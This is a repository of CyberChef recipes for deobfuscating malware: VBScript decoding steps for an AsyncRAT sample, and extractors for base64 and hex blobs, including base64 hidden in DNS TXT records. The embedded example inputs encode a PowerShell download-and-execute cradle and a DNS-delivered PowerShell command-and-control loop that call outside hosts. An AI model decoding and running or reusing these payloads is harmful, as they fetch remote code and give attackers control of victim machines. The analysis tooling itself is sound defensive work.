├── README.md
├── Twitter
    └── 2023-03-22-AsyncRAT-Vbs-Script.txt
├── extract_base64.json
├── extract_base64_from_dns_txt_records.txt
└── extract_url_from_hex_blob.json


/README.md:
--------------------------------------------------------------------------------
1 | # CyberChef Recipes
2 | 
3 | A list of CyberChef recipes that I have found useful. 
4 | 
5 | These are in a .json format that can be copy/pasted, or otherwise imported into cyberchef for re-use. 
6 | 


--------------------------------------------------------------------------------
/Twitter/2023-03-22-AsyncRAT-Vbs-Script.txt:
--------------------------------------------------------------------------------
 1 | 
 2 | Malware Hash: 	07e25cb7d427ac047f53b3badceacf6fc5fb395612ded5d3566a09800499cd7d
 3 | Link: https://bazaar.abuse.ch/sample/26c9f29fceaee8b13ba0fe4d7170f50c8046e43e11e461a43ce92b22d8e24bf5/
 4 | PW: infected
 5 | 
 6 | Recipes can be imported into CyberChef
 7 | 
 8 | # Part 1: Decimal Decoding (Link)
 9 | https://gchq.github.io/CyberChef/#recipe=Subsection('%22?%26?chr%5C%5C(%5C%5Cd%2B%5C%5C)%26?%22?',true,true,false)Regular_expression('User%20defined','%5C%5Cd%2B',true,true,false,false,false,false,'List%20matches')From_Decimal('Space',false)Merge(true)Find_/_Replace(%7B'option':'Regex','string':'%22%5B%5C%5C%2B%26%5D%22'%7D,'',true,false,true,false)Syntax_highlighter('auto%20detect')
10 | 
11 | # Part 1: Decimal Decoding (Recipe)
12 | 
13 | Subsection('"?&?chr\\(\\d+\\)&?"?',true,true,false)
14 | Regular_expression('User defined','\\d+',true,true,false,false,false,false,'List matches')
15 | From_Decimal('Space',false)
16 | Merge(true)
17 | Find_/_Replace({'option':'Regex','string':'"[\\+&]"'},'',true,false,true,false)
18 | Syntax_highlighter('auto detect')
19 | 
20 | 
21 | # Part 2: Removing String Reverse (Link)
22 | https://gchq.github.io/CyberChef/#recipe=Subsection('StrReverse%5C%5C(%22.%7B10,50%7D%22%5C%5C)',true,true,false)Regular_expression('User%20defined','%22.*%22',true,true,false,false,false,false,'List%20matches')Reverse('Character')Merge(true)Syntax_highlighter('vbscript')
23 | 
24 | 
25 | # Part 2: Removing String Reverse (Recipe) 
26 | 
27 | Subsection('StrReverse\\(".{10,50}"\\)',true,true,false)
28 | Regular_expression('User defined','".*"',true,true,false,false,false,false,'List matches')
29 | Reverse('Character')
30 | Merge(true)
31 | Syntax_highlighter('vbscript')
32 | 
33 | 
34 | # Part 3: Removing Replace Operations (Link)
35 | https://gchq.github.io/CyberChef/#recipe=Subsection('Replace%5C%5C(%22%5B%5E,%22%5D%2B%22,%22%5B%5E,%22%5D%2B%22,%22.%22%5C%5C)',true,true,false)Escape_string('Special%20chars','Single',false,true,false)Register('Replace%5C%5C((%22%5B%5E,%22%5D%2B%22),%22(%5B%5E,%22%5D%2B)%22,%22(.)%22%5C%5C)',true,false,false)Regular_expression('User%20defined','$R0',true,true,false,false,false,false,'List%20matches')Find_/_Replace(%7B'option':'Regex','string':'$R1'%7D,'$R2',true,false,false,true)Merge(true)Syntax_highlighter('vbscript')
36 | 
37 | # Part 3: Removing Replace Operations (Recipe)
38 | 
39 | Subsection('Replace\\("[^,"]+","[^,"]+","."\\)',true,true,false)
40 | Escape_string('Special chars','Single',false,true,false)
41 | Register('Replace\\(("[^,"]+"),"([^,"]+)","(.)"\\)',true,false,false)
42 | Regular_expression('User defined','$R0',true,true,false,false,false,false,'List matches')
43 | Find_/_Replace({'option':'Regex','string':'$R1'},'$R2',true,false,false,true)
44 | Merge(true)
45 | Syntax_highlighter('vbscript')
46 | 
47 | 
48 | 
49 | 


--------------------------------------------------------------------------------
/extract_base64.json:
--------------------------------------------------------------------------------
 1 | # Extracts base64 blobs from input data, lists the base64 decoded blobs in output
 2 | 
 3 | 
 4 | #### Clean Json
 5 | [
 6 |   { "op": "Regular expression",
 7 |     "args": ["User defined", "[a-z0-9\\=\\+\\/]{100,}", true, true, false, false, false, false, "List matches"] },
 8 |   { "op": "Fork",
 9 |     "args": ["\\n", "\\n", false] },
10 |   { "op": "From Base64",
11 |     "args": ["A-Za-z0-9+/=", true, false] },
12 |   { "op": "Remove null bytes",
13 |     "args": [] }
14 | ]
15 | 
16 | 
17 | ### Chef Format
18 | Regular_expression('User defined','[a-z0-9\\=\\+\\/]{100,}',true,true,false,false,false,false,'List matches')
19 | Fork('\\n','\\n',false)
20 | From_Base64('A-Za-z0-9+/=',true,false)
21 | Remove_null_bytes()
22 | 
23 | 
24 | # Link with example data
25 | https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','%5Ba-z0-9%5C%5C%3D%5C%5C%2B%5C%5C/%5D%7B100,%7D',true,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)Remove_null_bytes()&input=QzpcV2luZG93c1xTeXN0ZW0zMlxXaW5kb3dzUG93ZXJTaGVsbFx2MS4wXHBvd2Vyc2hlbGwuRVhFIC1ub3AgLWVwIGJ5cGFzcyAtZSBTUUJGQUZnQUlBQW9BRTRBWlFCM0FDMEFUd0JpQUdvQVpRQmpBSFFBSUFCT0FHVUFkQUF1QUZjQVpRQmlBRU1BYkFCcEFHVUFiZ0IwQUNrQUxnQmtBRzhBZHdCdUFHd0Fid0JoQUdRQWN3QjBBSElBYVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBT2dBdkFDOEFjQUF1QUdVQWN3QjBBRzhBYmdCcEFHNEFaUUF1QUdNQWJ3QnRBQzhBY0FBL0FITUFiUUJpQUNjQUtRQT0K
26 | 


--------------------------------------------------------------------------------
/extract_base64_from_dns_txt_records.txt:
--------------------------------------------------------------------------------
 1 | #Example Data
 2 | 
 3 | https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Regex','string':'_'%7D,'%2B',true,false,true,false)Regular_expression('User%20defined','%5Ba-zA-Z0-9%5C%5C%3D%5C%5C%2B%5C%5C/%5D%7B50,%7D',false,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=ICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi5BQUFBQUp6NUtvY3V4Z2pnWHdOYVhmVGc1SjVJT2JmR1JVcHQ0YWcyUmZFNUk5ZXB4bnFxNE04SHU3VkdWQ19NNkowVjg4U0s1ZFllX0sxNUs1c0Z0ajREcXRrQ1pYakkxY01XODBjTWg3VFk0Sk0xNVF0OW40b1JRWFlvR3FvWGkyaGxqZTl6Vkxla2U2ZzhzdGJlWUV2Nkp3UVRhR05weUNYZXp2N1RzWEhRdDFZY2FJQl9jNXI4MmdoYlUyVmpkWEpwZEhrdVEzSjVjSFJ2WjNKaGNHaDVMbE5JUVRJMU5sMGtjMmhoSUQwZ1cxTmxZM1Z5YVhSNUxrTnllWEIwYjJkeVlYQm9lUzVUU0VFeU5UWmRPanBEY21WaGRHVW9LUTBLSkcxaFkyZDFhV1FnUFNBb1IyVjBMVWwwWlcxUWNtOXdaWEowZVNBb0tDaGJjbVZuWlhoZE9qcE5ZWFJqYUdWektDZDVhSEJoY21kdmRIQjVja05jZEdadmMyOXlZMmxOWEVWU1FWZFVSazlUWERwTlRFdElKeXduTGljcyIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi5OQUVBQUNkU2FXZG9kRlJ2VEdWbWRDY3BJSHdnUm05eVJXRmphQ0I3SkY4dWRtRnNkV1Y5S1NBdGFtOXBiaUFuSnlrcElDMU9ZVzFsSUUxaFkyaHBibVZIZFdsa0tTNU5ZV05vYVc1bFIxVkpSRHNOQ2lSMWMyVnlhV1FnUFNBaUpDZ2taVzUyT2xWVFJWSkVUMDFCU1U0cEpDZ2taVzUyT2xWVFJWSk9RVTFGS1NRb0pHVnVkanBRVWs5RFJWTlRUMUpmVWtWV1NWTkpUMDRwSkNna1pXNTJPbEJTVDBORlUxTlBVbDlKUkVWT1ZFbEdTVVZTS1NRb0pHVnVkanBRVWs5RFJWTlRUMUpmVEVWV1JVd3BKQ2drWlc1Mk9rNVZUVUpGVWw5UFJsOVFVazlEUlZOVFQxSlRLU1FvSkcxaFkyZDFhV1FwSWpzTkNpUm5kV2xrSUQwZ0tDUnphR0V1UTI5dGNIVjBaVWhoYzJnb1cxUmxlSFF1Ulc1amIyUnBibWRkT2pwVlZFWTRMa2RsZEVKNWRHVnpLQ1IxYzJWeSIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi5hQUlBQUdsa0tTa2dmQ0JHYjNKRllXTm9MVTlpYW1WamRDQlViMU4wY21sdVp5QllNaWtnTFdwdmFXNGdKeWM3RFFwM2FHbHNaU0FvSkhSeWRXVXBJSHNnRFFvZ0lDQWdkSEo1SUhzZ0RRb2dJQ0FnSUNBZ0lDUnlJRDBnU1c1MmIydGxMVkpsYzNSTlpYUm9iMlFnTFZWeWFTQWlhSFIwY0RvdkwyTm9ZWFJuYVdkcE1pNWpiMjB2WVhCcEwzWXhMeVFvSkdkMWFXUXBJZzBLSUNBZ0lDQWdJQ0JwWmlBb0pISWdMVzVsSUNjbktTQjdJQTBLSUNBZ0lDQWdJQ0FnSUNBZ0pHSjFaaUE5SUZ0RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna2NpazdEUW9nSUNBZ0lDQWdJQ0FnSUNCbWIzSWdLQ1JwSUQwZ01Ec2dKR2tnTFd4MElDUmlkV1l1VEdWdVozUm9PeUFrYVNzcktTQjdEUW9nSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdKR0oxWmxzayIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi5uQU1BQUdsZElEMGdKR0oxWmxza2FWMGdMV0o0YjNJZ01qSTdEUW9nSUNBZ0lDQWdJQ0FnSUNCOURRb2dJQ0FnSUNBZ0lDQWdJQ0FrYkdsdVpYTWdQU0JiVkdWNGRDNUZibU52WkdsdVoxMDZPa0ZUUTBsSkxrZGxkRk4wY21sdVp5Z2tZblZtS1M1VGNHeHBkQ2dpWUhKZ2JpSXBPdzBLSUNBZ0lDQWdJQ0FnSUNBZ0pIQWdQU0JiUkdsaFoyNXZjM1JwWTNNdVVISnZZMlZ6YzEwNk9tNWxkeWdwT3cwS0lDQWdJQ0FnSUNBZ0lDQWdKSEF1VTNSaGNuUkpibVp2TGxkcGJtUnZkMU4wZVd4bElEMGdKMGhwWkdSbGJpYzdEUW9nSUNBZ0lDQWdJQ0FnSUNBa2NDNVRkR0Z5ZEVsdVptOHVSbWxzWlU1aGJXVWdQU0FuY0c5M1pYSnphR1ZzYkM1bGVHVW5PdzBLSUNBZ0lDQWdJQ0FnSUNBZ0pIQXVVM1JoY25SSmJtWnZMbFZ6WlZOb1pXeHNSWGhsWTNWMCIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi4wQVFBQUdVZ1BTQWtabUZzYzJVN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FrY0M1VGRHRnlkRWx1Wm04dVVtVmthWEpsWTNSVGRHRnVaR0Z5WkVsdWNIVjBJRDBnSkhSeWRXVTdEUW9nSUNBZ0lDQWdJQ0FnSUNBa2NDNVRkR0Z5ZEVsdVptOHVVbVZrYVhKbFkzUlRkR0Z1WkdGeVpFOTFkSEIxZENBOUlDUjBjblZsT3cwS0lDQWdJQ0FnSUNBZ0lDQWdKSEF1VTNSaGNuUW9LVHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lDUndMa0psWjJsdVQzVjBjSFYwVW1WaFpFeHBibVVvS1RzTkNpQWdJQ0FnSUNBZ0lDQWdJR1p2Y21WaFkyZ2dLQ1JzYVc1bElHbHVJQ1JzYVc1bGN5a2dldzBLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ1J3TGxOMFlXNWtZWEprU1c1d2RYUXVWM0pwZEdWTWFXNWxLQ1JzYVc1bEtUc2dJQTBLSUNBZ0lDQWdJQ0FnSUNBZ2ZRMEtJQ0FnSUNBZyIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAicHJpdmF0cHJveHktc2NobmVsbHZwbi54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDE5ODYsCiAgICAgICAgICAgICJkYXRhIjogIi5CQVlBQUNBZ0lDQWdJQ1J3TGxOMFlXNWtZWEprU1c1d2RYUXVWM0pwZEdWTWFXNWxLQ2NuS1RzZ0lBMEtJQ0FnSUNBZ0lDQWdJQ0FnSkhBdVYyRnBkRVp2Y2tWNGFYUW9LVHNOQ2lBZ0lDQWdJQ0FnSUNBZ0lHSnlaV0ZyT3cwS0lDQWdJQ0FnSUNCOUlBMEtJQ0FnSUgwZ0RRb2dJQ0FnWTJGMFkyZ2dldzBLSUNBZ0lIMGdEUW9nSUNBZ1UzUmhjblF0VTJ4bFpYQWdNZzBLZlEwSyIKICAgICAgICB9CiAgICBdCn0KewogICAgIlN0YXR1cyI6IDAsCiAgICAiVEMiOiBmYWxzZSwKICAgICJSRCI6IHRydWUsCiAgICAiUkEiOiB0cnVlLAogICAgIkFEIjogZmFsc2UsCiAgICAiQ0QiOiBmYWxzZSwKICAgICJRdWVzdGlvbiI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJuYW1lIjogImFob3JhdmlkZW8tZW5kcG9pbnQueHl6LiIsCiAgICAgICAgICAgICJ0eXBlIjogMTYKICAgICAgICB9CiAgICBdLAogICAgIkFuc3dlciI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJuYW1lIjogImFob3JhdmlkZW8tZW5kcG9pbnQueHl6LiIsCiAgICAgICAgICAgICJ0eXBlIjogMTYsCiAgICAgICAgICAgICJUVEwiOiA3MjAwLAogICAgICAgICAgICAiZGF0YSI6ICIuQkJJRlpKUTFSSlRTTWpJeUFqSXlNakl5TWpJeU1qSXlNakl5TWpJMDlHSUVGVFUwaFBURVVnVFVGTU8xY2hVa1VqSXlNakl5TWpJIgogICAgICAgIH0sCiAgICAgICAgewogICAgICAgICAgICAibmFtZSI6ICJhaG9yYXZpZGVvLWVuZHBvaW50Lnh5ei4iLAogICAgICAgICAgICAidHlwZSI6IDE2LAogICAgICAgICAgICAiVFRMIjogNzIwMCwKICAgICAgICAgICAgImRhdGEiOiAiLkl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU5JUlV4TVR5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5IgogICAgICAgIH0sCiAgICAgICAgewogICAgICAgICAgICAibmFtZSI6ICJhaG9yYXZpZGVvLWVuZHBvaW50Lnh5ei4iLAogICAgICAgICAgICAidHlwZSI6IDE2LAogICAgICAgICAgICAiVFRMIjogNzIwMCwKICAgICAgICAgICAgImRhdGEiOiAiLkl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU5JUlV4TVR5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5Lk1qSXlNakl5TWpJQ01qSTFsUFZTQkJVa1VnVEZWRFMxa2dTU0JUUVZaRlJDQlpUMVVnUmxKUFRTQkNSVU5QVFVsT1J5LkJCSUZaSlExUkpUU01qSXlBakl5TWpJeU1qSXlNakl5TWpJeU1qSTA5R0lFRlRVMGhQVEVVZ1RVRk1PMWNoVWtVakl5TWpJeU1qSS55TWpJeU1qSXlNakl5TWdJeU1qSXlNakl5TWpJeU1qSXlNakkyTnNaV0Z1SUhsdmRYSWdaR1YyYVdObElFNVBWeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJQ01qSXlNakl5TWpJeU1qSTBSSi5RVkpJUlVFZ1ZFOGdRVXhNSUVOUFNVNVRWRVZCVEVWU1V5TWpJeU1qSXlNakl5TWpJeU1qSXlBakl5TWpJeU1qSXlNakl5TWpSVUZTVGlCWlQxVlNJRTFQVGtWWklGbFBWU0JRVlZCUVJWUlRJeU1qSXlNakl5TWpJeU1qSXlNPSIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAiYWhvcmF2aWRlby1lbmRwb2ludC54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDcyMDAsCiAgICAgICAgICAgICJkYXRhIjogIi5JeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlOSVJVeE1UeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJQ01qSTFsUFZTQkJVa1VnVEZWRFMxa2dTU0JUUVZaRlJDQlpUMVVnUmxKUFRTQkNSVU5QVFVsT1J5QkJJRlpKUTFSSlRTTWpJeUFqSXlNakl5TWpJeU1qSXlNakl5TWpJMDlHSUVGVFUwaFBURVVnVFVGTU8xY2hVa1VqSXlNakl5TWpJeU1qSXlNakl5TWpJeU1nSXlNakl5TWpJeU1qSXlNakl5TWpJMk5zWldGdUlIbHZkWElnWkdWMmFXTmxJRTVQVnlNakl5TWpJeU1qSXlNakl5TWpJeU1qSUNNakl5TWpJeU1qSXlNakkwUkpRVkpJUlVFZ1ZFOGdRVXhNSUVOUFNVNVRWRVZCVEVWU1V5TWpJeU1qSXlNakl5TWpJeU1qSXlBakl5TWpJeU1qSXlNakl5TWpSVUZTVGlCWlQxVlNJRTFQVGtWWklGbFBWU0JRVlZCUVJWUlRJeU1qSXlNakl5TWpJeU1qSXlNPSIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAiYWhvcmF2aWRlby1lbmRwb2ludC54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDcyMDAsCiAgICAgICAgICAgICJkYXRhIjogIi5Nakl5TWpJeU1qSUNNakkxbFBWU0JCVWtVZ1RGVkRTMWtnU1NCVFFWWkZSQ0JaVDFVZ1JsSlBUU0JDUlVOUFRVbE9SeSIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAiYWhvcmF2aWRlby1lbmRwb2ludC54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDcyMDAsCiAgICAgICAgICAgICJkYXRhIjogIi5RVkpJUlVFZ1ZFOGdRVXhNSUVOUFNVNVRWRVZCVEVWU1V5TWpJeU1qSXlNakl5TWpJeU1qSXlBakl5TWpJeU1qSXlNakl5TWpSVUZTVGlCWlQxVlNJRTFQVGtWWklGbFBWU0JRVlZCUVJWUlRJeU1qSXlNakl5TWpJeU1qSXlNPSIKICAgICAgICB9LAogICAgICAgIHsKICAgICAgICAgICAgIm5hbWUiOiAiYWhvcmF2aWRlby1lbmRwb2ludC54eXouIiwKICAgICAgICAgICAgInR5cGUiOiAxNiwKICAgICAgICAgICAgIlRUTCI6IDcyMDAsCiAgICAgICAgICAgICJkYXRhIjogIi55TWpJeU1qSXlNakl5TWdJeU1qSXlNakl5TWpJeU1qSXlNakkyTnNaV0Z1SUhsdmRYSWdaR1YyYVdObElFNVBWeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJQ01qSXlNakl5TWpJeU1qSTBSSiIKICAgICAgICB9
 4 | 
 5 | #Chef Format
 6 | 
 7 | Find_/_Replace({'option':'Regex','string':'_'},'+',true,false,true,false)
 8 | Regular_expression('User defined','[a-zA-Z0-9\\=\\+\\/]{50,}',false,true,false,false,false,false,'List matches')
 9 | Fork('\\n','\\n',false)
10 | From_Base64('A-Za-z0-9+/=',true,false)
11 | 
12 | #Clean JSON
13 | 
14 | [
15 |   { "op": "Find / Replace",
16 |     "args": [{ "option": "Regex", "string": "_" }, "+", true, false, true, false] },
17 |   { "op": "Regular expression",
18 |     "args": ["User defined", "[a-zA-Z0-9\\=\\+\\/]{50,}", false, true, false, false, false, false, "List matches"] },
19 |   { "op": "Fork",
20 |     "args": ["\\n", "\\n", false] },
21 |   { "op": "From Base64",
22 |     "args": ["A-Za-z0-9+/=", true, false] }
23 | ]
24 | 
25 | #Compact JSON
26 | 
27 | [{"op":"Find / Replace","args":[{"option":"Regex","string":"_"},"+",true,false,true,false]},{"op":"Regular expression","args":["User defined","[a-zA-Z0-9\\=\\+\\/]{50,}",false,true,false,false,false,false,"List matches"]},{"op":"Fork","args":["\\n","\\n",false]},{"op":"From Base64","args":["A-Za-z0-9+/=",true,false]}]
28 | 


--------------------------------------------------------------------------------
/extract_url_from_hex_blob.json:
--------------------------------------------------------------------------------
 1 | # Extracts all blobs of Hex data, then decodes and extracts unique URL's
 2 | # (eg from blobs that look like $aXoTDkd = '0d 0a 40 65 63 68 6f 20 6f')
 3 | 
 4 | 
 5 | # Clean Json
 6 | [
 7 |   { "op": "Regular expression",
 8 |     "args": ["User defined", "([a-f0-9]{2}[\\s,]*){15,}", true, true, false, false, false, false, "List matches"] },
 9 |   { "op": "Fork",
10 |     "args": ["\\n", "\\n", false] },
11 |   { "op": "Find / Replace",
12 |     "args": [{ "option": "Regex", "string": "," }, " ", true, false, true, false] },
13 |   { "op": "From Hex",
14 |     "args": ["Auto"] },
15 |   { "op": "Merge",
16 |     "args": [true] },
17 |   { "op": "Extract URLs",
18 |     "args": [false, true, true] }
19 | ]
20 | 
21 | 
22 | # Chef Format
23 | Regular_expression('User defined','([a-f0-9]{2}[\\s,]*){15,}',true,true,false,false,false,false,'List matches')
24 | Fork('\\n','\\n',false)
25 | Find_/_Replace({'option':'Regex','string':','},' ',true,false,true,false)
26 | From_Hex('Auto')
27 | Merge(true)
28 | Extract_URLs(false,true,true)
29 | 
30 | 
31 | # Link
32 | https://gchq.github.io/CyberChef/#recipe=Regular_expression('User%20defined','(%5Ba-f0-9%5D%7B2%7D%5B%5C%5Cs,%5D*)%7B15,%7D',true,true,false,false,false,false,'List%20matches')Fork('%5C%5Cn','%5C%5Cn',false)Find_/_Replace(%7B'option':'Regex','string':','%7D,'%20',true,false,true,false)From_Hex('Auto')Merge(true)Extract_URLs(false,true,true)
33 | 


--------------------------------------------------------------------------------